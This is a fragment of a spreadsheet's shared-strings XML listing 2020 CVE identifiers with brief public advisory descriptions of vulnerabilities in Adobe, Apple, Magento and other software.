  </si>
  <si>
    <t>CVE-2020-9676</t>
  </si>
  <si>
    <t>CVE-2020-9677</t>
  </si>
  <si>
    <t>Adobe Prelude versions 9.0 and earlier have an out-of-bounds read vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9678</t>
  </si>
  <si>
    <t>Adobe Prelude versions 9.0 and earlier have an out-of-bounds write vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-9679</t>
  </si>
  <si>
    <t>CVE-2020-9680</t>
  </si>
  <si>
    <t>CVE-2020-9681</t>
  </si>
  <si>
    <t>Adobe Genuine Service version 6.6 (and earlier) is affected by an Uncontrolled Search Path element vulnerability. An authenticated attacker could exploit this to rewrite the file of the administrator, which may lead to elevated permissions. Exploitation of this issue requires user interaction.</t>
  </si>
  <si>
    <t>CVE-2020-9682</t>
  </si>
  <si>
    <t>Adobe Creative Cloud Desktop Application versions 5.1 and earlier have a symlink vulnerability vulnerability. Successful exploitation could lead to arbitrary file system write.</t>
  </si>
  <si>
    <t>CVE-2020-9683</t>
  </si>
  <si>
    <t>Adobe Photoshop versions Photoshop CC 2019, and Photoshop 2020 have an out-of-bounds read vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9684</t>
  </si>
  <si>
    <t>Adobe Photoshop versions Photoshop CC 2019, and Photoshop 2020 have an out-of-bounds write vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-9685</t>
  </si>
  <si>
    <t>CVE-2020-9686</t>
  </si>
  <si>
    <t>CVE-2020-9687</t>
  </si>
  <si>
    <t>CVE-2020-9688</t>
  </si>
  <si>
    <t>Adobe Download Manager version 2.0.0.518 have a command injection vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9689</t>
  </si>
  <si>
    <t>Magento versions 2.3.5-p1 and earlier, and 2.3.5-p1 and earlier have a path traversal vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9690</t>
  </si>
  <si>
    <t>Magento versions 2.3.5-p1 and earlier, and 2.3.5-p1 and earlier have an observable timing discrepancy vulnerability. Successful exploitation could lead to signature verification bypass.</t>
  </si>
  <si>
    <t>CVE-2020-9691</t>
  </si>
  <si>
    <t>Magento versions 2.3.5-p1 and earlier, and 2.3.5-p1 and earlier have a dom-based cross-site scripting vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9692</t>
  </si>
  <si>
    <t>Magento versions 2.3.5-p1 and earlier, and 2.3.5-p1 and earlier have a security mitigation bypass vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9693</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2020.009.20074 and earlier, 2020.001.30002, 2017.011.30171 and earlier, and 2015.006.30523 and earlier have an out-of-bounds write vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-9694</t>
  </si>
  <si>
    <t>CVE-2020-9696</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2020.009.20074 and earlier, 2020.001.30002, 2017.011.30171 and earlier, and 2015.006.30523 and earlier have a security bypass vulnerability. Successful exploitation could lead to security feature bypass.</t>
  </si>
  <si>
    <t>CVE-2020-9697</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2020.009.20074 and earlier, 2020.001.30002, 2017.011.30171 and earlier, and 2015.006.30523 and earlier have a disclosure of sensitive data vulnerability. Successful exploitation could lead to memory leak.</t>
  </si>
  <si>
    <t>CVE-2020-9698</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2020.009.20074 and earlier, 2020.001.30002, 2017.011.30171 and earlier, and 2015.006.30523 and earlier have a buffer error vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-9699</t>
  </si>
  <si>
    <t>CVE-2020-9700</t>
  </si>
  <si>
    <t>CVE-2020-9701</t>
  </si>
  <si>
    <t>CVE-2020-9702</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2020.009.20074 and earlier, 2020.001.30002, 2017.011.30171 and earlier, and 2015.006.30523 and earlier have a stack exhaustion vulnerability. Successful exploitation could lead to application denial-of-service.</t>
  </si>
  <si>
    <t>CVE-2020-9703</t>
  </si>
  <si>
    <t>CVE-2020-9704</t>
  </si>
  <si>
    <t>CVE-2020-9705</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2020.009.20074 and earlier, 2020.001.30002, 2017.011.30171 and earlier, and 2015.006.30523 and earlier have an out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-9706</t>
  </si>
  <si>
    <t>CVE-2020-9707</t>
  </si>
  <si>
    <t>CVE-2020-9708</t>
  </si>
  <si>
    <t>The resolveRepositoryPath function doesn't properly validate user input and a malicious user may traverse to any valid Git repository outside the repoRoot. This issue may lead to unauthorized access of private Git repositories as long as the malicious user knows or brute-forces the location of the repository.</t>
  </si>
  <si>
    <t>CVE-2020-9710</t>
  </si>
  <si>
    <t>CVE-2020-9712</t>
  </si>
  <si>
    <t>CVE-2020-9714</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2020.009.20074 and earlier, 2020.001.30002, 2017.011.30171 and earlier, and 2015.006.30523 and earlier have a security bypass vulnerability. Successful exploitation could lead to privilege escalation .</t>
  </si>
  <si>
    <t>CVE-2020-9715</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2020.009.20074 and earlier, 2020.001.30002, 2017.011.30171 and earlier, and 2015.006.30523 and earlier have an use-after-free vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-9716</t>
  </si>
  <si>
    <t>CVE-2020-9717</t>
  </si>
  <si>
    <t>CVE-2020-9718</t>
  </si>
  <si>
    <t>CVE-2020-9719</t>
  </si>
  <si>
    <t>CVE-2020-9720</t>
  </si>
  <si>
    <t>CVE-2020-9721</t>
  </si>
  <si>
    <t>CVE-2020-9722</t>
  </si>
  <si>
    <t>CVE-2020-9723</t>
  </si>
  <si>
    <t>CVE-2020-9724</t>
  </si>
  <si>
    <t>Adobe Lightroom versions 9.2.0.10 and earlier have an insecure library loading vulnerability. Successful exploitation could lead to privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-9725</t>
  </si>
  <si>
    <t>Adobe FrameMaker version 2019.0.6 (and earlier versions) lacks proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. This could be exploited to execute arbitrary code with the privileges of the current user. User interaction is required to exploit this vulnerability in that the target must open a malicious FrameMaker file.</t>
  </si>
  <si>
    <t>CVE-2020-9726</t>
  </si>
  <si>
    <t>Adobe FrameMaker version 2019.0.6 (and earlier versions) has an out-of-bounds read vulnerability that could be exploited to read past the end of an allocated buffer, possibly resulting in a crash or disclosure of sensitive information from other memory locations. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious FrameMaker file.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L</t>
  </si>
  <si>
    <t>CVE-2020-9727</t>
  </si>
  <si>
    <t>A memory corruption vulnerability exists in InDesign 15.1.1 (and earlier versions). Insecure handling of a malicious indd file could be abused to cause an out-of-bounds memory access, potentially resulting in code execution in the context of the current user.</t>
  </si>
  <si>
    <t>CVE-2020-9728</t>
  </si>
  <si>
    <t>CVE-2020-9729</t>
  </si>
  <si>
    <t>CVE-2020-9730</t>
  </si>
  <si>
    <t>CVE-2020-9731</t>
  </si>
  <si>
    <t>CVE-2020-9732</t>
  </si>
  <si>
    <t>The AEM Forms add-on for versions 6.5.5.0 (and below) and 6.4.8.2 (and below) are affected by a stored XSS vulnerability that allows users with 'Author' privileges to store malicious scripts in fields associated with the Sites component. These scripts may be executed in a victim’s browser when they open the page containing the vulnerable field.</t>
  </si>
  <si>
    <t>CVE-2020-9733</t>
  </si>
  <si>
    <t>An AEM java servlet in AEM versions 6.5.5.0 (and below) and 6.4.8.1 (and below) executes with the permissions of a high privileged service user. If exploited, this could lead to read-only access to sensitive data in an AEM repository.</t>
  </si>
  <si>
    <t>CVE-2020-9734</t>
  </si>
  <si>
    <t>The AEM Forms add-on for versions 6.5.5.0 (and below) and 6.4.8.1 (and below) is affected by a stored XSS vulnerability that allows users with 'Author' privileges to store malicious scripts in fields associated with the Forms component. These scripts may be executed in a victim’s browser when they open the page containing the vulnerable field.</t>
  </si>
  <si>
    <t>CVE-2020-9735</t>
  </si>
  <si>
    <t>AEM versions 6.5.5.0 (and below), 6.4.8.1 (and below), 6.3.3.8 (and below) and 6.2 SP1-CFP20 (and below) are affected by a stored XSS vulnerability that allows users with access to the Content Repository Development Environment to store malicious scripts in certain node fields. These scripts may be executed in a victim’s browser when search queries return the page containing the vulnerable field.</t>
  </si>
  <si>
    <t>CVE-2020-9736</t>
  </si>
  <si>
    <t>AEM versions 6.5.5.0 (and below), 6.4.8.1 (and below), 6.3.3.8 (and below) and 6.2 SP1-CFP20 (and below) are affected by a stored XSS vulnerability that allows users with access to the Content Repository Development Environment to store malicious scripts in certain node fields. These scripts may be executed in a victim’s browser when browsing to the page containing the vulnerable field.</t>
  </si>
  <si>
    <t>CVE-2020-9737</t>
  </si>
  <si>
    <t>AEM versions 6.5.5.0 (and below), 6.4.8.1 (and below), 6.3.3.8 (and below) and 6.2 SP1-CFP20 (and below) are affected by a stored XSS vulnerability that allows users with access to the Content Repository Development Environment to store malicious scripts in certain node fields. These scripts may be executed in a victim’s browser when they open the page containing the vulnerable field.</t>
  </si>
  <si>
    <t>CVE-2020-9738</t>
  </si>
  <si>
    <t>AEM versions 6.5.5.0 (and below), 6.4.8.1 (and below), 6.3.3.8 (and below) and 6.2 SP1-CFP20 (and below) are affected by a stored XSS vulnerability that allows users with access to the Content Repository Development Environment to store malicious scripts in certain node fields. These scripts may be executed in a victim’s browser when visiting the page containing the vulnerable field.</t>
  </si>
  <si>
    <t>CVE-2020-9739</t>
  </si>
  <si>
    <t>Adobe Media Encoder version 14.3.2 (and earlier versions) has an out-of-bounds read vulnerability that could be exploited to read past the end of an allocated buffer, possibly resulting in a crash or disclosure of sensitive information from other memory locations. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2020-9740</t>
  </si>
  <si>
    <t>AEM versions 6.5.5.0 (and below), 6.4.8.1 (and below), 6.3.3.8 (and below) and 6.2 SP1-CFP20 (and below) are affected by a stored XSS vulnerability that allows users with 'Author' privileges to store malicious scripts in fields associated with the Design Importer. These scripts may be executed in a victim’s browser when they open the page containing the vulnerable field.</t>
  </si>
  <si>
    <t>CVE-2020-9741</t>
  </si>
  <si>
    <t>The AEM forms add-on for versions 6.5.5.0 (and below) and 6.4.8.2 (and below) is affected by a stored XSS vulnerability that allows users with 'Author' privileges to store malicious scripts in fields associated with the Forms component. These scripts may be executed in a victim’s browser when they open the page containing the vulnerable field.</t>
  </si>
  <si>
    <t>CVE-2020-9742</t>
  </si>
  <si>
    <t>AEM versions 6.5.5.0 (and below), 6.4.8.1 (and below) and 6.3.3.8 (and below) are affected by a stored XSS vulnerability that allows users with 'Author' privileges to store malicious scripts in fields associated with the Inbox calendar feature. These scripts may be executed in a victim’s browser when they open the page containing the vulnerable field.</t>
  </si>
  <si>
    <t>CVE-2020-9743</t>
  </si>
  <si>
    <t>AEM versions 6.5.5.0 (and below), 6.4.8.1 (and below), 6.3.3.8 (and below) and 6.2 SP1-CFP20 (and below) are affected by an HTML injection vulnerability in the content editor component that allows unauthenticated users to craft an HTTP request that includes arbitrary HTML code in a parameter value. An attacker could then use the malicious GET request to lure victims to perform unsafe actions in the page (ex. phishing).</t>
  </si>
  <si>
    <t>CVE-2020-9744</t>
  </si>
  <si>
    <t>CVE-2020-9745</t>
  </si>
  <si>
    <t>CVE-2020-9746</t>
  </si>
  <si>
    <t>Adobe Flash Player version 32.0.0.433 (and earlier) are affected by an exploitable NULL pointer dereference vulnerability that could result in a crash and arbitrary code execution. Exploitation of this issue requires an attacker to insert malicious strings in an HTTP response that is by default delivered over TLS/SSL.</t>
  </si>
  <si>
    <t>CVE-2020-9747</t>
  </si>
  <si>
    <t>Adobe Animate version 20.5 (and earlier) is affected by a double free vulnerability when parsing a crafted .fla file, which could result in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit.</t>
  </si>
  <si>
    <t>CVE-2020-9748</t>
  </si>
  <si>
    <t>Adobe Animate version 20.5 (and earlier) is affected by a stack overflow vulnerability, which could lead to arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted .fla file in Animate.</t>
  </si>
  <si>
    <t>CVE-2020-9749</t>
  </si>
  <si>
    <t>Adobe Animate version 20.5 (and earlier) is affected by an out-of-bounds read vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted .fla file in Animate.</t>
  </si>
  <si>
    <t>CVE-2020-9750</t>
  </si>
  <si>
    <t>Adobe Animate version 20.5 (and earlier) is affected by an out-of-bounds read vulnerability, which could result in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted .fla file in Animate.</t>
  </si>
  <si>
    <t>CVE-2020-9751</t>
  </si>
  <si>
    <t>Naver Cloud Explorer before 2.2.2.11 allows the system to download an arbitrary file from the attacker's server and execute it during the upgrade.</t>
  </si>
  <si>
    <t>CVE-2020-9752</t>
  </si>
  <si>
    <t>Naver Cloud Explorer before 2.2.2.11 allows the attacker can move a local file in any path on the filesystem as a system privilege through its named pipe.</t>
  </si>
  <si>
    <t>CVE-2020-9753</t>
  </si>
  <si>
    <t>Whale Browser Installer before 1.2.0.5 versions don't support signature verification for Flash installer.</t>
  </si>
  <si>
    <t>CVE-2020-9754</t>
  </si>
  <si>
    <t>NAVER Whale browser mobile app before 1.10.6.2 allows the attacker to bypass its browser unlock function via incognito mode.</t>
  </si>
  <si>
    <t>CVE-2020-9756</t>
  </si>
  <si>
    <t>Patriot Viper RGB Driver 1.1 and prior exposes IOCTL and allows insufficient access control. The IOCTL Codes 0x80102050 and 0x80102054 allows a local user with low privileges to read/write 1/2/4 bytes from or to an IO port. This could be leveraged in a number of ways to ultimately run code with elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9757</t>
  </si>
  <si>
    <t>The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.</t>
  </si>
  <si>
    <t>CVE-2020-9758</t>
  </si>
  <si>
    <t>An issue was discovered in chat.php in LiveZilla Live Chat 8.0.1.3 (Helpdesk). A blind JavaScript injection lies in the name parameter. Triggering this can fetch the username and passwords of the helpdesk employees in the URI. This leads to a privilege escalation, from unauthenticated to user-level access, leading to full account takeover. The attack fetches multiple credentials because they are stored in the database (stored XSS). This affects the mobile/chat URI via the lgn and psswrd parameters.</t>
  </si>
  <si>
    <t>CVE-2020-9759</t>
  </si>
  <si>
    <t>A Vulnerability of LG Electronic web OS TV Emulator could allow an attacker to escalate privileges and overwrite certain files. This vulnerability is due to wrong environment setting. An attacker could exploit this vulnerability through crafted configuration files and executable files.</t>
  </si>
  <si>
    <t>CVE-2020-9760</t>
  </si>
  <si>
    <t>An issue was discovered in WeeChat before 2.7.1 (0.3.4 to 2.7 are affected). When a new IRC message 005 is received with longer nick prefixes, a buffer overflow and possibly a crash can happen when a new mode is set for a nick.</t>
  </si>
  <si>
    <t>CVE-2020-9761</t>
  </si>
  <si>
    <t>An issue was discovered in UNCTAD ASYCUDA World 2001 through 2020. The Java RMI Server has an Insecure Default Configuration, leading to Java Code Execution from a remote URL because an RMI Distributed Garbage Collector method is called.</t>
  </si>
  <si>
    <t>CVE-2020-9767</t>
  </si>
  <si>
    <t>A vulnerability related to Dynamic-link Library (“DLL”) loading in the Zoom Sharing Service would allow an attacker who had local access to a machine on which the service was running with elevated privileges to elevate their system privileges as well through use of a malicious DLL. Zoom addressed this issue, which only applies to Windows users, in the 5.0.4 client release.</t>
  </si>
  <si>
    <t>CVE-2020-9768</t>
  </si>
  <si>
    <t>A use after free issue was addressed with improved memory management. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2. An application may be able to execute arbitrary code with system privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9769</t>
  </si>
  <si>
    <t>Multiple issues were addressed by updating to version 8.1.1850. This issue is fixed in macOS Catalina 10.15.4. Multiple issues in Vim.</t>
  </si>
  <si>
    <t>CVE-2020-9770</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in iOS 13.4 and iPadOS 13.4. An attacker in a privileged network position may be able to intercept Bluetooth traffic.</t>
  </si>
  <si>
    <t>CVE-2020-9771</t>
  </si>
  <si>
    <t>This issue was addressed with a new entitlement. This issue is fixed in macOS Catalina 10.15.4. A user may gain access to protected parts of the file system.</t>
  </si>
  <si>
    <t>CVE-2020-9772</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.4 and iPadOS 13.4, macOS Catalina 10.15.4, tvOS 13.4, watchOS 6.2. A sandboxed process may be able to circumvent sandbox restrictions.</t>
  </si>
  <si>
    <t>CVE-2020-9773</t>
  </si>
  <si>
    <t>The issue was addressed with improved handling of icon caches. This issue is fixed in iOS 14.0 and iPadOS 14.0. A malicious application may be able to identify what other applications a user has installed.</t>
  </si>
  <si>
    <t>CVE-2020-9774</t>
  </si>
  <si>
    <t>An issue existed with Siri Suggestions access to encrypted data. The issue was fixed by limiting access to encrypted data. This issue is fixed in macOS Catalina 10.15.3, Security Update 2020-001 Mojave, Security Update 2020-001 High Sierra. Encrypted data may be inappropriately accessed.</t>
  </si>
  <si>
    <t>CVE-2020-9775</t>
  </si>
  <si>
    <t>An issue existed in the handling of tabs displaying picture in picture video. The issue was corrected with improved state handling. This issue is fixed in iOS 13.4 and iPadOS 13.4. A user's private browsing activity may be unexpectedly saved in Screen Time.</t>
  </si>
  <si>
    <t>CVE-2020-9776</t>
  </si>
  <si>
    <t>This issue was addressed with a new entitlement. This issue is fixed in macOS Catalina 10.15.4. A malicious application may be able to access a user's call history.</t>
  </si>
  <si>
    <t>CVE-2020-9777</t>
  </si>
  <si>
    <t>An issue existed in the selection of video file by Mail. The issue was fixed by selecting the latest version of a video. This issue is fixed in iOS 13.4 and iPadOS 13.4. Cropped videos may not be shared properly via Mail.</t>
  </si>
  <si>
    <t>CVE-2020-9779</t>
  </si>
  <si>
    <t>CVE-2020-9780</t>
  </si>
  <si>
    <t>The issue was resolved by clearing application previews when content is deleted. This issue is fixed in iOS 13.4 and iPadOS 13.4. A local user may be able to view deleted content in the app switcher.</t>
  </si>
  <si>
    <t>CVE-2020-9781</t>
  </si>
  <si>
    <t>The issue was addressed by clearing website permission prompts after navigation. This issue is fixed in iOS 13.4 and iPadOS 13.4. A user may grant website permissions to a site they didn't intend to.</t>
  </si>
  <si>
    <t>CVE-2020-9782</t>
  </si>
  <si>
    <t>A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Catalina 10.15.2, Security Update 2019-002 Mojave, and Security Update 2019-007 High Sierra. A remote attacker may be able to overwrite existing files.</t>
  </si>
  <si>
    <t>CVE-2020-9783</t>
  </si>
  <si>
    <t>A use after free issue was addressed with improved memory management. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. Processing maliciously crafted web content may lead to code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9784</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in Safari 13.1. A malicious iframe may use another website’s download settings.</t>
  </si>
  <si>
    <t>CVE-2020-9785</t>
  </si>
  <si>
    <t>Multiple memory corruption issues were addressed with improved state management. This issue is fixed in iOS 13.4 and iPadOS 13.4, macOS Catalina 10.15.4, tvOS 13.4, watchOS 6.2. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9786</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks This issue is fixed in macOS Catalina 10.15.4, Security Update 2020-002 Mojave, Security Update 2020-002 High Sierra. An application may be able to trigger a sysdiagnose.</t>
  </si>
  <si>
    <t>CVE-2020-9787</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.4 and iPadOS 13.4, macOS Catalina 10.15.4, tvOS 13.4, watchOS 6.2. Some websites may not have appeared in Safari Preferences.</t>
  </si>
  <si>
    <t>CVE-2020-9788</t>
  </si>
  <si>
    <t>A validation issue was addressed with improved input sanitization. This issue is fixed in macOS Catalina 10.15.5. A file may be incorrectly rendered to execute JavaScript.</t>
  </si>
  <si>
    <t>CVE-2020-9789</t>
  </si>
  <si>
    <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9790</t>
  </si>
  <si>
    <t>CVE-2020-9791</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. Processing a maliciously crafted audio file may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9792</t>
  </si>
  <si>
    <t>A validation issue was addressed with improved input sanitization. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5. A USB device may be able to cause a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-9793</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A remote attacker may be able to cause arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9794</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. A malicious application may cause a denial of service or potentially disclose memory contents.</t>
  </si>
  <si>
    <t>CVE-2020-9795</t>
  </si>
  <si>
    <t>A use after free issue was addressed with improved memory management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9796</t>
  </si>
  <si>
    <t>A race condition was addressed with improved state handling. This issue is fixed in macOS Catalina 10.15.5. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9797</t>
  </si>
  <si>
    <t>An information disclosure issue was addressed by removing the vulnerable code. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application may be able to determine another application's memory layout.</t>
  </si>
  <si>
    <t>CVE-2020-9799</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Catalina 10.15.6. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9800</t>
  </si>
  <si>
    <t>A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9801</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in Safari 13.1.1. A malicious process may cause Safari to launch an application.</t>
  </si>
  <si>
    <t>CVE-2020-9802</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9803</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9804</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in macOS Catalina 10.15.5. Inserting a USB device that sends invalid messages may cause a kernel panic.</t>
  </si>
  <si>
    <t>CVE-2020-9805</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to universal cross site scripting.</t>
  </si>
  <si>
    <t>CVE-2020-9806</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9807</t>
  </si>
  <si>
    <t>CVE-2020-9808</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. An application may be able to cause unexpected system termination or write kernel memory.</t>
  </si>
  <si>
    <t>CVE-2020-9809</t>
  </si>
  <si>
    <t>An information disclosure issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application may be able to determine kernel memory layout.</t>
  </si>
  <si>
    <t>CVE-2020-9810</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in macOS Catalina 10.15.5. A person with physical access to a Mac may be able to bypass Login Window.</t>
  </si>
  <si>
    <t>CVE-2020-9811</t>
  </si>
  <si>
    <t>An information disclosure issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A local user may be able to read kernel memory.</t>
  </si>
  <si>
    <t>CVE-2020-9812</t>
  </si>
  <si>
    <t>CVE-2020-9813</t>
  </si>
  <si>
    <t>A logic issue existed resulting in memory corruption. This was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9814</t>
  </si>
  <si>
    <t>CVE-2020-9815</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. Processing a maliciously crafted audio file may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9816</t>
  </si>
  <si>
    <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9817</t>
  </si>
  <si>
    <t>A permissions issue existed. This issue was addressed with improved permission validation. This issue is fixed in macOS Catalina 10.15.5. A malicious application may be able to gain root privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9818</t>
  </si>
  <si>
    <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.5 and iPadOS 13.5, iOS 12.4.7, watchOS 6.2.5. Processing a maliciously crafted mail message may lead to unexpected memory modification or application termination.</t>
  </si>
  <si>
    <t>CVE-2020-9819</t>
  </si>
  <si>
    <t>A memory consumption issue was addressed with improved memory handling. This issue is fixed in iOS 13.5 and iPadOS 13.5, iOS 12.4.7, watchOS 6.2.5, watchOS 5.3.7. Processing a maliciously crafted mail message may lead to heap corruption.</t>
  </si>
  <si>
    <t>CVE-2020-9820</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.5 and iPadOS 13.5. A remote attacker may be able to modify the file system.</t>
  </si>
  <si>
    <t>CVE-2020-9821</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9822</t>
  </si>
  <si>
    <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Catalina 10.15.5. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
